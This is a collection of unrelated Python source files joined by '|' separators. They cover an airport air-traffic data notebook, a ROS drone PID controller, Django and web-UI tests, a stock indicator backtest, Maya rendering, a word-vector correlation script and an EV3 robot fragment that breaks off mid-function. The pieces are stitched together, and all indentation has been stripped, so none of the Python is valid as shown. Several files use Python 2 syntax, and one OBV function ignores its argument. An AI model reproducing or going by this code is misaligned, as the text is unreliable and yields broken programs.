# Data can be accessed by both JSON and CSV.
# In this part, we will read from JSON format and create simple ML.
# In[1]:
#source:
#https://data.sfgov.org/resource/rkru-6vcg.json
#https://data.world/singgih/airtrafficpassengerdataproject-4-11-2021/workspace/file?agentid=data-society&datasetid=air-traffic-passenger-data&filename=Air_Traffic_Passenger_Statistics.csv
import requests
import pandas as pd
from pandas.io.json import json_normalize
#from mlxtend.plotting import plot_decision_regions
from sklearn.metrics import confusion_matrix,classification_report
import matplotlib.pyplot as plt #ใช้ plot graph
import numpy as np
from sklearn import datasets, neighbors
import itertools
import random
from sklearn.cluster import KMeans
import csv
# # Get Response Air Traffic API:
# In[2]:
data_response = requests.get("https://data.sfgov.org/resource/rkru-6vcg.json") ## <== Air Traffic API
# # See Response Code (you should get 200 OK)
# for more information : https://developer.mozilla.org/en-US/docs/Web/HTTP/Status
#
# 200 means that the response is successfully sent
# In[3]:
print(data_response.status_code)
# # Let's see your Raw Data
# In[4]:
print(data_response.json())
# Now, put the JSON format in the frame to make it easier to understand
# In[5]:
data_json = pd.read_json("https://data.sfgov.org/resource/rkru-6vcg.json")
data_json.head(5)
# See the data only based on "activity period" and Passenger Count" (coloumn)
# In[6]:
df1=data_json[["activity_period", "geo_region", "activity_type_code", "passenger_count"]]
df1.head()
# # Now We want to see specifically for "deplaned" activity
# It can be use to predict how many tourist come to this airport
# In[ ]:
# In[ ]:
# # Predict the Air Traffic in the future
# Using the data in 2020, we want to predict tourist coming to the airport
# In[ ]:
# In[ ]:
|
def is_distance_regular(G): ...
def global_parameters(b, c): ...
def intersection_array(G): ...
def is_strongly_regular(G): ...
|
import numpy as np
import networkx as nx
import bsp
import matplotlib.pyplot as plt
segments = np.array([
[[-1.5, 0], [2, 0]],
[[-2, -1], [-2, 1]],
[[2, -2], [6, 2]],
[[-1, -4], [-4, 2]]
])
tree = bsp.build_tree(segments)
fig = plt.figure(figsize=(8,8))
axis = plt.subplot(2,1,1)
axis.grid()
for segment in segments:
axis.plot(*(segment.T), "o-", color='k', linewidth=3, markersize=12)
ax2 = plt.subplot(2,1,2)
for _,segments in tree.nodes.data('colinear_segments'):
for segment in segments:
ax2.plot(*(segment.T), "o-", linewidth=3, markersize=12)
ax2.grid()
ax2.set_xlim(axis.get_xlim())
ax2.set_ylim(axis.get_ylim())
plt.show()
|
# Given a string S and a character C, return an array of integers
# representing the shortest distance from the character C in the string.
class Solution:
def shortestToChar(self, S, C):
res = []
buffer = []
indeces = [ii for ii in range(len(S)) if S[ii] == C]
for ii in range(len(S)):
for jj in map(lambda x: x - ii, indeces):
buffer.append(abs(jj))
res.append(min(buffer))
buffer = []
return res
if __name__ == "__main__":
testinput1 = "marcoseibellissimo"
testinput2 = 'o'
print(Solution.shortestToChar(Solution, testinput1, testinput2))
|
from slack_sdk.models.dialoags import AbstractDialogSelector # noqa
from slack_sdk.models.dialoags import DialogChannelSelector # noqa
from slack_sdk.models.dialoags import DialogConversationSelector # noqa
from slack_sdk.models.dialoags import DialogExternalSelector # noqa
from slack_sdk.models.dialoags import DialogStaticSelector # noqa
from slack_sdk.models.dialoags import DialogTextArea # noqa
from slack_sdk.models.dialoags import DialogTextComponent # noqa
from slack_sdk.models.dialoags import DialogTextField # noqa
from slack_sdk.models.dialoags import DialogUserSelector # noqa
from slack_sdk.models.dialoags import TextElementSubtypes # noqa
from slack import deprecation
deprecation.show_message(__name__, "slack_sdk.models.blocks")
|
# -*- coding: utf-8 -*-
from model_mommy import mommy
from django.test import TestCase
from app.customer.models import Customer
from app.fleet import models
class ModelsTestCase(TestCase):
def setUp(self):
self.customer = mommy.make(Customer, cnh_type=['A'])
self.vehicle = mommy.make(models.Fleet)
def test_validate_cnh_type_a_motorcycle_true(self):
self.vehicle.category = 'motorcycle'
self.vehicle.save()
self.assertTrue(self.vehicle._validate_cnh_type(self.customer))
def test_validate_cnh_type_b_car_true(self):
self.customer.cnh_type = ['B']
self.customer.save()
self.vehicle.category = 'car'
self.vehicle.save()
self.assertTrue(self.vehicle._validate_cnh_type(self.customer))
def test_validate_cnh_type_c_utility_true(self):
self.customer.cnh_type = ['C']
self.customer.save()
self.vehicle.category = 'utility'
self.vehicle.save()
self.assertTrue(self.vehicle._validate_cnh_type(self.customer))
def test_validate_cnh_type_d_truck_true(self):
self.customer.cnh_type = ['D']
self.customer.save()
self.vehicle.category = 'truck'
self.vehicle.save()
self.assertTrue(self.vehicle._validate_cnh_type(self.customer))
def test_validate_cnh_type_e_truck_true(self):
self.customer.cnh_type = ['E']
self.customer.save()
self.vehicle.category = 'truck'
self.vehicle.save()
self.assertTrue(self.vehicle._validate_cnh_type(self.customer))
def test_validate_cnh_type_false(self):
self.vehicle.category = 'car'
self.vehicle.save()
self.assertFalse(self.vehicle._validate_cnh_type(self.customer))
def test_can_rent(self):
self.vehicle.category = 'motorcycle'
self.vehicle.save()
self.assertTrue(self.vehicle.can_rent(self.customer))
def test_unicode(self):
self.vehicle.vehicle_name = 'Palio'
self.vehicle.save()
self.assertEqual(self.vehicle.__unicode__(), 'Palio')
|
import pandas as pd
import numpy as np
import talib as ta
import tushare as ts
import matplotlib.pyplot as plt
def OBV(ts_code):
dw = ts.get_k_data("600647")
dw = dw[300:]
dw.index = range(len(dw))
obvta = ta.OBV(dw['close'].values,dw['volume'].values)
obv=[]
for i in range(0,len(dw)):
if i == 0:
obv.append(dw['volume'].values[i])
else:
if dw['close'].values[i]>dw['close'].values[i-1]:
obv.append(obv[-1]+dw['volume'].values[i])
if dw['close'].values[i]<dw['close'].values[i-1]:
obv.append(obv[-1]-dw['volume'].values[i])
if dw['close'].values[i]==dw['close'].values[i-1]:
obv.append(obv[-1])
dw['obv'] = obv
plt.plot(dw['close'].values)
sum=0
total=10000
asset=10000
back_test(np.array(dw['close'].values),obv)
'''
for i in range(0,len(dw)-1):
if obv[i+1]>obv[i] and dw['open'].values[i]>dw['open'].values[i+1]:
total=total-dw['open'].values[i]*100
sum=sum+100
asset=dw['open'].values[i]*sum+total
elif obv[i+1]<obv[i] and dw['open'].values[i]<dw['open'].values[i+1]:
if sum>100:
total=total+dw['open'].values[i]*100
sum=sum-100
elif sum<=100:
total=total+dw['open'].values[i]*sum
sum=0
asset=dw['open'].values[i]*sum+total
print("day: "+str(i)+"sum:"+str(sum)+"total:"+str(total)+"asset:"+str(asset))
'''
OBV("600600")
|
#!/usr/bin/env python
import rospy
import time
import math
from geometry_msgs.msg import Vector3
from geometry_msgs.msg import PoseStamped
from std_msgs.msg import Empty
from pid_class import PID
from rosgraph_msgs.msg import Clock
from std_msgs.msg import String
class PositionController():
def __init__(self):
# Allow the simulator to start
time.sleep(5)
# When this node shutsdown
rospy.on_shutdown(self.shutdown_sequence)
# Set the rate
self.rate = 100.0
self.dt = 1.0 / self.rate
# Getting the PID parameters
stable_gains = rospy.get_param('/position_controller_node/gains/stable/', {'p': 1, 'i': 0.0, 'd': 0.0})
Kp_s, Ki_s, Kd_s = stable_gains['p'], stable_gains['i'], stable_gains['d']
# If the speed is set to unstable waypoint
Kp = Kp_s
Ki = Ki_s
Kd = Kd_s
# Display incoming parameters
rospy.loginfo(str(rospy.get_name()) + ": Launching with the following parameters:")
rospy.loginfo(str(rospy.get_name()) + ": p - " + str(Kp))
rospy.loginfo(str(rospy.get_name()) + ": i - " + str(Ki))
rospy.loginfo(str(rospy.get_name()) + ": d - " + str(Kd))
rospy.loginfo(str(rospy.get_name()) + ": rate - " + str(self.rate))
# Creating the PID's
self.pos_x_PID = PID(Kp, Ki, Kd, self.rate)
self.pos_y_PID = PID(Kp, Ki, Kd, self.rate)
self.pos_z_PID = PID(Kp, Ki, Kd, self.rate)
# Get the setpoints
self.x_setpoint = 0
self.y_setpoint = 0
self.z_setpoint = 3
# Create the current output readings
self.x_pos = 0
self.y_pos = 0
self.z_pos = 0
# Create the subscribers and publishers
self.vel_set_sub = rospy.Publisher('/uav/input/velocity', Vector3, queue_size=1)
self.gps_sub = rospy.Subscriber("uav/sensors/gps", PoseStamped, self.get_gps)
self.pos_set_sub = rospy.Subscriber("uav/input/position", Vector3, self.set_pos)
# Run the communication node
self.ControlLoop()
# This is the main loop of this class
def ControlLoop(self):
# Set the rate
rate = rospy.Rate(50)
# Keep track how many loops have happend
loop_counter = 0
# While running
while not rospy.is_shutdown():
# Use a PID to calculate the velocity you want
x_proportion = self.pos_x_PID.get_output(self.x_setpoint, self.x_pos)
y_proportion = self.pos_y_PID.get_output(self.y_setpoint, self.y_pos)
z_proportion = self.pos_z_PID.get_output(self.z_setpoint, self.z_pos)
# Initialize the components of the vector
x_vel = 0
y_vel = 0
z_vel = 0
# Set the velocity based on distance
x_vel = x_proportion
y_vel = y_proportion
z_vel = z_proportion
# Create and publish the data
velocity = Vector3(x_vel, y_vel, z_vel)
self.vel_set_sub.publish(velocity)
# Sleep any excess time
rate.sleep()
# Call back to get the gps data
def get_gps(self, msg):
self.x_pos = msg.pose.position.x
self.y_pos = msg.pose.position.y
self.z_pos = msg.pose.position.z
# Call back to get the position setpoints
def set_pos(self, msg):
# If our set point changes reset the PID build up
check_x = self.x_setpoint != msg.x
check_y = self.y_setpoint != msg.y
check_z = self.z_setpoint != msg.z
if check_x or check_y or check_z:
self.pos_x_PID.remove_buildup()
self.pos_y_PID.remove_buildup()
self.pos_z_PID.remove_buildup()
self.x_setpoint = msg.x
self.y_setpoint = msg.y
self.z_setpoint = msg.z
# Called on ROS shutdown
def shutdown_sequence(self):
rospy.loginfo(str(rospy.get_name()) + ": Shutting Down")
def main():
rospy.init_node('position_controller_node')
try:
poscon = PositionController()
except rospy.ROSInterruptException:
pass
if __name__ == '__main__':
main()
|
#!/usr/bin/env python3
#
# Copyright (C) 2020 Cambridge Astronomical Survey Unit
#
# This program is free software: you can redistribute it and/or modify it under
# the terms of the GNU General Public License as published by the Free Software
# Foundation, either version 3 of the License, or (at your option) any later
# version.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
# details.
#
# You should have received a copy of the GNU General Public License along with
# this program. If not, see <https://www.gnu.org/licenses/>.
#
from ifu.workflow.utils import populate_fits_table_template
def create_mos_field_cat(mos_field_template,
data_dict,
output_filename,
trimester,
author,
report_verbosity=1,
cc_report='',
overwrite=False):
"""
Create a IFU driver catalogue using a template and the needed information.
Parameters
----------
mos_field_template : str
A FITS file containing an MOS field template.
data_dict : dict
A dictionary with the information needed to populate the columns of the
IFU driver template. The keys of the dictionary should be the column
names, while their values should be list or array-like objects with the
information of each column.
output_filename : str
The name of the output file for the new IFU driver catalogue.
trimester : str
The trimester of the catalogue (e.g. 2020A1).
author : str
The email address of the author of the catalogue.
report_verbosity : {0, 1}, optional
The level of verbosity which will be inherited in the files to be
submitted to WASP.
cc_report : str, optional
A comma separated list of email addresses to be CC'ed in WASP
submisions.
overwrite : bool, optional
Overwrite the output FITS file containing the IFU driver catalogue.
Returns
-------
output_filename : str
The name of the output file for the new IFU driver catalogue.
"""
assert report_verbosity in [0, 1]
primary_kwds = {
'TRIMESTE': trimester,
'VERBOSE': report_verbosity,
'AUTHOR': author,
'CCREPORT': cc_report
}
populate_fits_table_template(mos_field_template,
data_dict,
output_filename,
primary_kwds=primary_kwds,
update_datetime=True,
overwrite=overwrite)
return output_filename
|
import maya.cmds as cmds #importing maya commands to python
import maya.mel #Maya Embbeded Language
s = cmds.ls(selection = True) #locking the selection of the user ( say object or camera or path,etc)
camName=cmds.listCameras()
cName=camName[0]
cx=0 #assigning angles to zero degrees on each axis
cy=0
cz=0
v=45 #increment angle
im=0
while (cx <=360): #while loop for X axis
for a in s:
x = a +"."+"rotate" +"X" #setting the input parameter to rotate camera on X axis
cmds.setAttr(x,cx) #command to rotate on X axis
cy=0
while(cy<=360):
for a in s:
x = a +"."+"rotate" +"Y" #setting the input parameter to rotate camera on Y axis
cmds.setAttr(x,cy)
cz=0
while(cz<=360):
for a in s:
x = a +"."+"rotate" +"Z" #setting the input parameter to rotate camera on Z axis
cmds.setAttr(x,cz)
cp=cmds.xform(cName,q=True,ws=True, rp=True) #cp = camera position
if(cp[1]>0): #capturing everthing above X plane- remove this capture bottom views as well
mel.eval('renderWindowRender redoPreviousRender renderView') #opening render view in Maya
editor = 'renderView'
cmds.renderWindowEditor( editor, e=True,refresh = True, writeImage=(r'Path_Name'+'_X'+str(cx)+'_Y'+str(cy)+'_Z'+str(cz))) #saving render image to specified path in local directory
im=im+1
cz=cz+v
cy=cy+v
cx=cx+v
|
# Sean Kim
# Unit 3 Review Problem 11
def get_scores ():
dict = {}
print ("Enter the name/score pairs separated by a space.")
pair = input().strip()
while len(pair) > 0:
items = pair.split()
key = items[0]
defi = items[1]
dict[key] = defi
pair = input().strip()
return dict
def main ():
print (get_scores())
main()
|
from pprint import pprint
import os
devices = [
'iPhone SE',
'iPhone 8',
'iPhone 8 Plus',
'iPhone X',
'iPhone XS Max',
]
screenshots = [
'10_Wallet',
'20_History',
'30_Channels',
'40_Receive',
]
expected = set()
for device in devices:
for screenshot in screenshots:
expected.add(f'{device}-{screenshot}.png')
print(expected)
subfolders = [f.path for f in os.scandir('.') if f.is_dir() ]
for language in subfolders:
existing = set([os.path.basename(f.path) for f in os.scandir(language) if f.is_file() and f.path.endswith('.png') ])
missing = expected.difference(existing)
additional = existing.difference(expected)
if missing or additional:
print(f"\n{language}\n------------------------------------")
exit_code = 1
if missing:
print("⚠️ Missing Screenshots:")
pprint(missing)
if additional:
print("⚠️ Additional Screenshots:")
pprint(additional)
|
import time, pytest
import sys,os
sys.path.insert(1,os.path.abspath(os.path.join(os.path.dirname( __file__ ),'..','..','lib')))
from clsCommon import Common
import clsTestService
from localSettings import *
import localSettings
from utilityTestFunc import *
import enums
class Test:
#================================================================================================================================
# @Author: Inbar Willman
# Test Name: Watch History - Filter by media type
# The test's Flow:
# Login to KMS-> Upload entries from all types -> Go to entry page and play entry -> Go to
# My History page and filter entries by media type - video
# test cleanup: deleting the uploaded file
#================================================================================================================================
testNum = "2697"
supported_platforms = clsTestService.updatePlatforms(testNum)
status = "Pass"
timeout_accured = "False"
driver = None
common = None
# Test variables
entryDescription = "description"
entryTags = "tag1,"
QuizQuestion1 = 'First question'
QuizQuestion1Answer1 = 'First answer'
QuizQuestion1AdditionalAnswers = ['Second answer', 'Third question', 'Fourth question']
questionNumber = 1
filePathVideo = localSettings.LOCAL_SETTINGS_MEDIA_PATH + r'\videos\QR30SecMidRight.mp4'
filePathQuiz = localSettings.LOCAL_SETTINGS_MEDIA_PATH + r'\videos\QR30SecMidRight.mp4'
filePathAudio = localSettings.LOCAL_SETTINGS_MEDIA_PATH + r'\Audios\audio.mp3'
filePathImage = localSettings.LOCAL_SETTINGS_MEDIA_PATH + r'\images\AutomatedBenefits.jpg'
#run test as different instances on all the supported platforms
@pytest.fixture(scope='module',params=supported_platforms)
def driverFix(self,request):
return request.param
def test_01(self,driverFix,env):
try:
logStartTest(self,driverFix)
############################# TEST SETUP ###############################
#capture test start time
self.startTime = time.time()
#initialize all the basic vars and start playing
self,self.driver = clsTestService.initializeAndLoginAsUser(self, driverFix)
self.common = Common(self.driver)
########################################################################
self.entryAudio = clsTestService.addGuidToString('audioType', self.testNum)
self.entryVideo = clsTestService.addGuidToString('videoType', self.testNum)
self.entryQuiz = clsTestService.addGuidToString('quizType', self.testNum)
self.entryImage = clsTestService.addGuidToString('imageType', self.testNum)
self.entriesToDelete = [self.entryAudio, self.entryVideo, self.entryQuiz + " - Quiz" , self.entryImage]
self.entriesToUpload = {
self.entryAudio: self.filePathAudio,
self.entryVideo: self.filePathVideo,
self.entryQuiz: self.filePathQuiz,
self.entryImage: self.filePathImage
}
self.filterByImage = {self.entryAudio: False, self.entryVideo: False, self.entryQuiz + " - Quiz": False,self.entryImage: True}
self.filterByAudio = {self.entryAudio: True, self.entryVideo: False, self.entryQuiz + " - Quiz": False, self.entryImage: False}
self.filterByVideo = {self.entryAudio: False, self.entryVideo: True, self.entryQuiz + " - Quiz": False, self.entryImage: False}
self.filterByQuiz = {self.entryAudio: False, self.entryVideo: False, self.entryQuiz + " - Quiz": True, self.entryImage: False}
self.filterByAllMedia = {self.entryAudio: True, self.entryVideo: True, self.entryQuiz + " - Quiz": True, self.entryImage: True}
# self.filterByImage = {'CCCAE781-2697-audioType': False, 'CCCAE781-2697-videoType': False, 'CCCAE781-2697-quizType - Quiz': False,'CCCAE781-2697-imageType': True}
# self.filterByAudio = {'CCCAE781-2697-audioType': True, 'CCCAE781-2697-videoType': False, 'CCCAE781-2697-quizType - Quiz': False, 'CCCAE781-2697-imageType': False}
# self.filterByVideo = {'CCCAE781-2697-audioType': False, 'CCCAE781-2697-videoType': True, 'CCCAE781-2697-quizType - Quiz': False, 'CCCAE781-2697-imageType': False}
# self.filterByQuiz = {'CCCAE781-2697-audioType': False, 'CCCAE781-2697-videoType': False, 'CCCAE781-2697-quizType - Quiz': True, 'CCCAE781-2697-imageType': False}
# self.filterByAllMedia = {'CCCAE781-2697-audioType': True, 'CCCAE781-2697-videoType': True, 'CCCAE781-2697-quizType - Quiz': True, 'CCCAE781-2697-imageType': True}
########################## TEST STEPS - MAIN FLOW #######################
writeToLog("INFO","Step 1: Going to upload entries")
if self.common.upload.uploadEntries(self.entriesToUpload, self.entryDescription, self.entryTags) == False:
self.status = "Fail"
writeToLog("INFO","Step 1: FAILED to upload entry")
return
writeToLog("INFO","Step 2: Going to navigate to uploaded entry page")
if self.common.entryPage.navigateToEntry(self.entryQuiz) == False:
self.status = "Fail"
writeToLog("INFO","Step 2: FAILED to navigate to entry page")
return
writeToLog("INFO","Step 3: Going to wait until media will finish processing")
if self.common.entryPage.waitTillMediaIsBeingProcessed() == False:
self.status = "Fail"
writeToLog("INFO","Step 3: FAILED - New entry is still processing")
return
writeToLog("INFO","Step 4: Going to navigate to add new video quiz")
if self.common.upload.addNewVideoQuiz() == False:
self.status = "Fail"
writeToLog("INFO","Step 4: FAILED to click video quiz")
return
writeToLog("INFO","Step 5: Going to search the uploaded entry and open KEA")
if self.common.kea.searchAndSelectEntryInMediaSelection(self.entryQuiz, False) == False:
self.status = "Fail"
writeToLog("INFO","Step 5: FAILED to find entry and open KEA")
return
writeToLog("INFO","Step 6: Going to start quiz and add questions")
if self.common.kea.addQuizQuestion(self.QuizQuestion1, self.QuizQuestion1Answer1, self.QuizQuestion1AdditionalAnswers) == False:
self.status = "Fail"
writeToLog("INFO","Step 6: FAILED to start quiz and add questions")
return
writeToLog("INFO","Step 7: Going to save quiz and navigate to media page")
if self.common.kea.clickDone() == False:
self.status = "Fail"
writeToLog("INFO","Step 7: FAILED to save quiz and navigate to media page")
return
writeToLog("INFO","Step 8: Going to play quiz entry")
if self.common.player.navigateToQuizEntryAndClickPlay(self.entryQuiz + " - Quiz", self.questionNumber) == False:
self.status = "Fail"
writeToLog("INFO","Step 8: FAILED to navigate and play entry")
return
writeToLog("INFO","Step 9: Going to switch to default content")
if self.common.base.switch_to_default_content() == False:
self.status = "Fail"
writeToLog("INFO","Step 9: FAILED to switch to default content")
return
writeToLog("INFO","Step 10: Going to play audio entry")
if self.common.player.navigateToEntryClickPlayPause(self.entryAudio, '0:05', toVerify=False, timeout=50) == False:
self.status = "Fail"
writeToLog("INFO","Step 10: FAILED to navigate and play audio entry")
return
writeToLog("INFO","Step 9: Going to switch to default content")
if self.common.base.switch_to_default_content() == False:
self.status = "Fail"
writeToLog("INFO","Step 9: FAILED to switch to default content")
return
writeToLog("INFO","Step 11: Going to play video entry")
if self.common.player.navigateToEntryClickPlayPause(self.entryVideo, '0:05') == False:
self.status = "Fail"
writeToLog("INFO","Step 11: FAILED to navigate and play video entry")
return
writeToLog("INFO","Step 9: Going to switch to default content")
if self.common.base.switch_to_default_content() == False:
self.status = "Fail"
writeToLog("INFO","Step 9: FAILED to switch to default content")
return
writeToLog("INFO","Step 12: Going to 'play' image entry")
if self.common.entryPage.navigateToEntry(self.entryImage) == False:
self.status = "Fail"
writeToLog("INFO","Step 12: FAILED to navigate and 'play' image entry")
return
writeToLog("INFO","Step 13: Going to navigate to history page")
if self.common.myHistory.navigateToMyHistory(True) == False:
self.status = "Fail"
writeToLog("INFO","Step 12: FAILED to navigate to history page")
return
writeToLog("INFO","Step 14: Going to filter entries by media type audio")
if self.common.myHistory.filterInMyHistory(dropDownListName = enums.MyHistoryFilters.MEDIA_TYPE, dropDownListItem = enums.MediaType.AUDIO) == False:
self.status = "Fail"
writeToLog("INFO","Step 14: FAILED to filter entries by media type audio")
return
writeToLog("INFO","Step 15: Going to check that correct entries for audio filter are displayed")
if self.common.myHistory.verifyFiltersInMyHistory(self.filterByAudio) == False:
self.status = "Fail"
writeToLog("INFO","Step 15: FAILED to displayed correct entries for audio type")
return
writeToLog("INFO","Step 16: Going to verify that only entries with " + enums.MediaType.AUDIO.value + " icon display")
if self.common.myMedia.verifyEntryTypeIcon([self.entryAudio], enums.MediaType.AUDIO) == False:
self.status = "Fail"
writeToLog("INFO","Step 16: FAILED to filter and verify my media entries by '" + enums.MediaType.AUDIO.value + "'")
return
writeToLog("INFO","Step 17: Going to filter entries by media video audio")
if self.common.myHistory.filterInMyHistory(dropDownListName = enums.MyHistoryFilters.MEDIA_TYPE, dropDownListItem = enums.MediaType.VIDEO) == False:
self.status = "Fail"
writeToLog("INFO","Step 17: FAILED to filter entries by media type video")
return
writeToLog("INFO","Step 18: Going to check that correct entries for video filter are displayed")
if self.common.myHistory.verifyFiltersInMyHistory(self.filterByVideo) == False:
self.status = "Fail"
writeToLog("INFO","Step 18: FAILED to displayed correct entries for video type")
return
writeToLog("INFO","Step 19: Going to verify that only entries with " + enums.MediaType.VIDEO.value + " icon display")
if self.common.myMedia.verifyEntryTypeIcon([self.entryVideo], enums.MediaType.VIDEO) == False:
self.status = "Fail"
writeToLog("INFO","Step 19: FAILED to filter and verify my media entries by '" + enums.MediaType.VIDEO.value + "'")
return
writeToLog("INFO","Step 20: Going to filter entries by media type quiz")
if self.common.myHistory.filterInMyHistory(dropDownListName = enums.MyHistoryFilters.MEDIA_TYPE, dropDownListItem = enums.MediaType.QUIZ) == False:
self.status = "Fail"
writeToLog("INFO","Step 20: FAILED to filter entries by media type quiz")
return
writeToLog("INFO","Step 21: Going to check that correct entries for quiz filter are displayed")
if self.common.myHistory.verifyFiltersInMyHistory(self.filterByQuiz) == False:
self.status = "Fail"
writeToLog("INFO","Step 21: FAILED to displayed correct entries for quiz type")
return
writeToLog("INFO","Step 22: Going to verify that only entries with " + enums.MediaType.QUIZ.value + " icon display")
if self.common.myMedia.verifyEntryTypeIcon([self.entryQuiz + " - Quiz"], enums.MediaType.QUIZ) == False:
self.status = "Fail"
writeToLog("INFO","Step 22: FAILED to filter and verify my media entries by '" + enums.MediaType.QUIZ.value + "'")
return
writeToLog("INFO","Step 23: Going to filter entries by media type audio")
if self.common.myHistory.filterInMyHistory(dropDownListName = enums.MyHistoryFilters.MEDIA_TYPE, dropDownListItem = enums.MediaType.IMAGE) == False:
self.status = "Fail"
writeToLog("INFO","Step 23: FAILED to filter entries by media type audio")
return
writeToLog("INFO","Step 24: Going to check that correct entries for image filter are displayed")
if self.common.myHistory.verifyFiltersInMyHistory(self.filterByImage) == False:
self.status = "Fail"
writeToLog("INFO","Step 24: FAILED to displayed correct entries for image type")
return
writeToLog("INFO","Step 25: Going to verify that only entries with " + enums.MediaType.IMAGE.value + " icon display")
if self.common.myMedia.verifyEntryTypeIcon([self.entryImage], enums.MediaType.IMAGE) == False:
self.status = "Fail"
writeToLog("INFO","Step 25: FAILED to filter and verify my media entries by '" + enums.MediaType.IMAGE.value + "'")
return
writeToLog("INFO","Step 26: Going to filter entries by media type audio")
if self.common.myHistory.filterInMyHistory(dropDownListName = enums.MyHistoryFilters.MEDIA_TYPE, dropDownListItem = enums.MediaType.ALL_MEDIA) == False:
self.status = "Fail"
writeToLog("INFO","Step 26: FAILED to filter entries by media type audio")
return
writeToLog("INFO","Step 27: Going to check that correct entries for all media filter are displayed")
if self.common.myHistory.verifyFiltersInMyMedia(self.filterByAllMedia) == False:
self.status = "Fail"
writeToLog("INFO","Step 27: FAILED to displayed correct entries for all media type")
return
#########################################################################
writeToLog("INFO","TEST PASSED")
# If an exception happened we need to handle it and fail the test
except Exception as inst:
self.status = clsTestService.handleException(self,inst,self.startTime)
########################### TEST TEARDOWN ###########################
def teardown_method(self,method):
try:
self.common.handleTestFail(self.status)
writeToLog("INFO","**************** Starting: teardown_method **************** ")
self.common.base.switch_to_default_content()
self.common.myMedia.deleteEntriesFromMyMedia(self.entriesToDelete)
writeToLog("INFO","**************** Ended: teardown_method *******************")
except:
pass
clsTestService.basicTearDown(self)
#write to log we finished the test
logFinishedTest(self,self.startTime)
assert (self.status == "Pass")
pytest.main('test_' + testNum + '.py --tb=line')
|
# -*- coding: utf-8 -*-
"""
Spyder Editor
This temporary script file is located here:
C:\Users\Standard User\.spyder2\.temp.py
"""
import numpy as np
import csv
import time
from sklearn import cross_validation
from sklearn.metrics import make_scorer
traindata = []
file_name = "C:/Users/Standard User/Downloads/train.csv"
reader = csv.DictReader(open(file_name, 'rb'), delimiter=',', quotechar='"')
for row in reader:
traindata.append(row)
for sub in traindata:
for key in sub:
if key == 'id' or key == 'num_votes' or key == 'num_comments' or key == 'num_views':
sub[key] = int(sub[key])
elif key == 'latitude' or key =='longitude':
sub[key] = float(sub[key])
elif key == 'created_time':
sub[key] = time.mktime(time.strptime(sub[key], "%Y-%m-%d %H:%M:%S")) # make time into datetime (float)
testdata = []
file_name = "C:/Users/Standard User/Downloads/test.csv"
reader = csv.DictReader(open(file_name, 'rb'), delimiter=',', quotechar='"')
for row in reader:
testdata.append(row)
for sub in testdata:
for key in sub:
if key == 'id' or key == 'num_votes' or key == 'num_comments' or key == 'num_views':
sub[key] = int(sub[key])
elif key == 'latitude' or key =='longitude':
sub[key] = float(sub[key])
elif key == 'created_time':
sub[key] = time.mktime(time.strptime(sub[key], "%Y-%m-%d %H:%M:%S"))
print testdata[id]
|
#!/usr/bin/env python
"""
Single script for computing spearman correlation between different models
and the compositionality ratings.
"""
import sys
import argparse
from os.path import basename
from numbers import Number
import pandas as pd
from util import openfile, df_remove_pos, read_vector_file
from distances import cosine, calculate_distance_metrics as cdm
from matrix import norm2_matrix
DISTANCE_METRIC = cosine
def numeric_columns(dataframe):
return [dataframe[c] for c in dataframe.columns if isinstance(dataframe[c][0], Number)]
def pairs(lst):
for i, x in enumerate(lst):
for y in lst[i+1:]:
yield x, y
def correlations(dataframe):
from scipy.stats import spearmanr
output = []
columns = list(numeric_columns(dataframe))
for col1, col2 in pairs(columns):
rho, p = spearmanr(col1, col2)
output.append(dict(col1=col1.name, col2=col2.name, rho=rho, p=p))
return pd.DataFrame(output, columns=("col1", "col2", "rho", "p"))
def scatters(dataframe, filename):
from matplotlib import pyplot as plt
from matplotlib.backends.backend_pdf import PdfPages
pp = PdfPages(filename)
plt.locator_params(tight=True)
columns = list(numeric_columns(dataframe))
for col1, col2 in pairs(columns):
plt.plot(col1, col2, 'o')
xspace = 0.05 * (col1.max() - col1.min())
yspace = 0.05 * (col2.max() - col2.min())
plt.axis([col1.min() - xspace, col1.max() + xspace, col2.min() - yspace, col2.max() + yspace])
plt.xlabel(col1.name)
plt.ylabel(col2.name)
pp.savefig()
plt.clf()
pp.close()
def main():
parser = argparse.ArgumentParser(
description='Computes correlations with compositionality ratings.')
parser.add_argument('--input', '-i', action="append", type=openfile,
metavar="FILE", help='Input vector space.')
parser.add_argument('--ratings', '-r', metavar='COMPFILE', type=openfile,
help='The compositionality ratings file.')
parser.add_argument('--self', '-s', action="store_true",
help='Whether we should include self-comp ratings.')
parser.add_argument('--no-tsv', '-T', action="store_true",
help="*Don't* output the TSV containing comp and model ratings.")
parser.add_argument('--corrs', '-c', action="store_true",
help='Specifies whether correlations should be computed and outputed.')
parser.add_argument('--pdf', '-p', metavar="FILE", default=None,
help='Output plots as a PDF to the given filename.')
args = parser.parse_args()
compratings = pd.read_table(args.ratings)
if not args.self:
compratings = compratings[compratings["compound"] != compratings["const"]]
word_pairs = set(zip(compratings['compound'], compratings['const']))
named_vector_spaces = [
(basename(f.name), norm2_matrix(df_remove_pos(read_vector_file(f))))
for f in args.input
]
if len(named_vector_spaces) > 1:
# need to do concatenation
names, vses = zip(*named_vector_spaces)
concat_space = pd.concat(vses, keys=names)
named_vector_spaces.append(("<concat>", concat_space))
# compute all the distances AND keep the different measures independently named
distances = [
cdm(vs, word_pairs, [DISTANCE_METRIC])
.rename(columns={DISTANCE_METRIC.name: fn + ":" + DISTANCE_METRIC.name})
for fn, vs in named_vector_spaces
]
# now we need to join all the distance calculations:
joined_measures = reduce(pd.merge, distances).rename(
columns={"left": "compound", "right": "const"})
# finally join the similarity measures with the human ratings
dm_and_comp = pd.merge(compratings, joined_measures)
# output dm_and_comp unless the user specified not to
if not args.no_tsv:
dm_and_comp.to_csv(sys.stdout, index=False, sep="\t")
# nicer output
if not args.no_tsv and args.corrs:
# let's compute our correlations
print "\n" + "-" * 80 + "\n"
# compute and output correlations if the user asked
if args.corrs:
corrs = correlations(dm_and_comp).to_csv(sys.stdout, index=False, sep="\t")
# plot the measures if the user asked.
if args.pdf:
scatters(dm_and_comp, args.pdf)
if __name__ == '__main__':
main()
|
#!/usr/bin/env python3
# Import the EV3-robot library
import ev3dev.ev3 as ev3
from time import sleep
# Constructor
btn = ev3.Button()
shut_down = False
# Main method
def run():
# sensors
cs = ev3.ColorSensor('in2'); assert cs.connected # measures light intensity
shut_down = False
cs.mode = 'COL-REFLECT' # measure light intensity
# motors
lm = ev3.LargeMotor('outB'); assert lm.connected # left motor
